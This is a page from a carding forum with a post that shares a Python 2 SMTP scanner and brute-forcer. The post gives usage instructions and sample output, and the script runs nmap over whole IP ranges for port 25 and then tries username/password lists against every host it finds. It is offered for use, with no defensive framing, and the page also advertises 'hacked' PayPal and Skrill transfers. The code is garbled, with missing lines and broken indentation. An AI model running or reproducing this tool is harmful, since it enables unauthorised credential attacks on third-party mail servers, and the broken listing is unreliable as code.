We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Python] SMTP Scanner/Brute Forcer

To make brute.py run you need to make it executable so u gotta do chmod +x brute.py
after that u can run it like this in below Grin

[user:js@linuxbox ~]$ python brute.py 61.1.*.* userlist.txt passwordlist.txt

d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0

[+] Scanning: 61.1.*.*
[+] Users Loaded: 182
[+] Words Loaded: 53

This will scan the whole 61.1 range, u can adjust this as u like...... i sorted out the username and password list from the most common brute forces, so u can leave that as it is.

#Smtp Brute Forcer, searches ip_range for hosts using smtp.
#[Doar userii inregistrati pot vedea linkurile. ]

import threading, time, StringIO, commands, random, sys, smtplib, re, socket
from smtplib import SMTP
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>"

      users = open(sys.argv[2], "r").readlines()
      print "Error: Check your userlist path\n"
      words = open(sys.argv[3], "r").readlines()
      print "Error: Check your wordlist path\n"

print "\n\t   d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)

wordlist = copy(words)

def scan():

    iprange = sys.argv[1]
    ip_list = []
    nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()
    for tmp in nmap:
        ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
        if ipaddr:
    return ip_list

def reloader():
    for word in wordlist:

def getword():
    lock = threading.Lock()
    if len(words) != 0:
        value = random.sample(words,  1)
        value = random.sample(words,  1)
    return value[0][:-1]
class Workhorse(threading.Thread):
    def run(self):
        value = getword()
            print "-"*12
            print "User:",user[:-1],"Password:",value
            smtp = smtplib.SMTP(ip)
            smtp.login(user[:-1], value)
            print "\t\nLogin successful:",user, value
        except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
            #print "An error occurred:", msg

ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
    print "\n\tAttempting BruteForce:",ip,"\n"
        helo = smtplib.SMTP(ip)
        print helo.helo(), "\n"
    except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
        print "Server doesn't support the Helo cmd"
    for user in users:
        for i in range(len(words)):
            if i == 0: reloader()
            work = Workhorse()
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]

Forum Jump: